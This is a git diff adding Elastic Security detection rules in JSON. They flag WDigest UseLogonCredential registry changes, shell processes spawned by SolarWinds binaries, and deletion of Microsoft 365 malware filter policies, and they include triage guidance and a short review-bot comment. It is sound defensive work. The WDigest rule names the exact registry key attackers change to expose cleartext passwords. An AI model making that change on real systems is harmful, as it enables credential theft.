"package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_108.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_108.json new file mode 100644 index 00000000000..5519564d142 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_108.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to modify the WDigest security provider in the registry to force the user's password to be stored in clear text in memory. This behavior can be indicative of an adversary attempting to weaken the security configuration of an endpoint. Once the UseLogonCredential value is modified, the adversary may attempt to dump clear text passwords from memory.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of WDigest Security Provider", + "note": "## Triage and analysis\n\n### Investigating Modification of WDigest Security Provider\n\nIn Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol allows clients to send cleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications based on RFC 2617 and 2831. Windows versions up to 8 and 2012 store logon credentials in memory in plaintext by default, which is no longer the case with newer Windows versions.\n\nStill, attackers can force WDigest to store the passwords insecurely on the memory by modifying the `HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential` registry key. This activity is commonly related to the execution of credential dumping tools.\n\n#### Possible investigation steps\n\n- It is unlikely that the monitored registry key was modified legitimately in newer versions of Windows. Analysts should treat any activity triggered from this rule with high priority as it typically represents an active adversary.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if credential dumping tools were run on the host, and retrieve and analyze suspicious executables:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team, as these modifications expose the entire domain to credential compromises and consequently unauthorized access.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\"\n ) and registry.data.strings : (\"1\", \"0x00000001\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and user.id : \"S-1-5-18\")\n", + "references": [ + "https://www.csoonline.com/article/3438824/how-to-detect-and-halt-credential-theft-via-windows-wdigest.html", + "https://www.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft?edition=2019", + "https://frsecure.com/compromised-credentials-response-playbook", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + 
"name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109.json new file mode 100644 index 00000000000..ae03953cc0f --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to modify the WDigest security provider in the registry to force the user's password to be stored in clear text in memory. This behavior can be indicative of an adversary attempting to weaken the security configuration of an endpoint. Once the UseLogonCredential value is modified, the adversary may attempt to dump clear text passwords from memory.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of WDigest Security Provider", + "note": "## Triage and analysis\n\n### Investigating Modification of WDigest Security Provider\n\nIn Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol allows clients to send cleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications based on RFC 2617 and 2831. Windows versions up to 8 and 2012 store logon credentials in memory in plaintext by default, which is no longer the case with newer Windows versions.\n\nStill, attackers can force WDigest to store the passwords insecurely on the memory by modifying the `HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential` registry key. This activity is commonly related to the execution of credential dumping tools.\n\n#### Possible investigation steps\n\n- It is unlikely that the monitored registry key was modified legitimately in newer versions of Windows. Analysts should treat any activity triggered from this rule with high priority as it typically represents an active adversary.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if credential dumping tools were run on the host, and retrieve and analyze suspicious executables:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team, as these modifications expose the entire domain to credential compromises and consequently unauthorized access.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\"\n ) and registry.data.strings : (\"1\", \"0x00000001\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and user.id : \"S-1-5-18\")\n", + "references": [ + "https://www.csoonline.com/article/3438824/how-to-detect-and-halt-credential-theft-via-windows-wdigest.html", + "https://www.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft?edition=2019", + "https://frsecure.com/compromised-credentials-response-playbook", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + 
"name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_110.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_110.json new file mode 100644 index 00000000000..b4e430e27fc --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_110.json 
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected.", + "false_positives": [ + "Trusted SolarWinds child processes. Verify process details such as network connections and file writes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Execution via SolarWinds Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name: (\"cmd.exe\", \"powershell.exe\") and\nprocess.parent.name: (\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\"\n )\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20FILEWRITES%20(METHODOLOGY).ioc" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and 
default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87_110", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_111.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_111.json new file mode 100644 index 00000000000..3cf8bf00efb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_111.json 
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected.", + "false_positives": [ + "Trusted SolarWinds child processes. Verify process details such as network connections and file writes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Execution via SolarWinds Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name: (\"cmd.exe\", \"powershell.exe\") and\nprocess.parent.name: (\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\"\n )\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20FILEWRITES%20(METHODOLOGY).ioc" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` 
and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87_111", + "type": "security-rule" +} \ No newline at end of file 
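Review bot: The `process.name` list in the query matches `cmd.exe` and `powershell.exe` only, so a PowerShell 7 interpreter (`pwsh.exe`) started by the same SolarWinds parents would not be caught; if that narrowing is deliberate the `description` (`Cmd.exe or Powershell.exe`) is accurate as written, otherwise consider adding `"pwsh.exe"` to the `process.name` list. The change of `index` from `logs-endpoint.events.*` in `_110` to `logs-endpoint.events.process-*` here is consistent with the `process where` query and only trims unrelated data streams. This file looks like a generated rule export, so either adjustment presumably belongs in the upstream rule source rather than in this package copy.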
diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_103.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_103.json new file mode 100644 index 00000000000..48515d9b128 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_103.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection.", + "false_positives": [ + "A malware filter policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense 
Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_105.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_105.json new file mode 100644 index 00000000000..218b94351eb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_105.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection.", + "false_positives": [ + "A malware filter policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense 
Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_206.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_206.json new file mode 100644 index 00000000000..16afdd6dbc0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_206.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection.", + "false_positives": [ + "A malware filter policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense 
Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_1.json b/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_1.json new file mode 100644 index 00000000000..f40fd3205a5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_1.json 
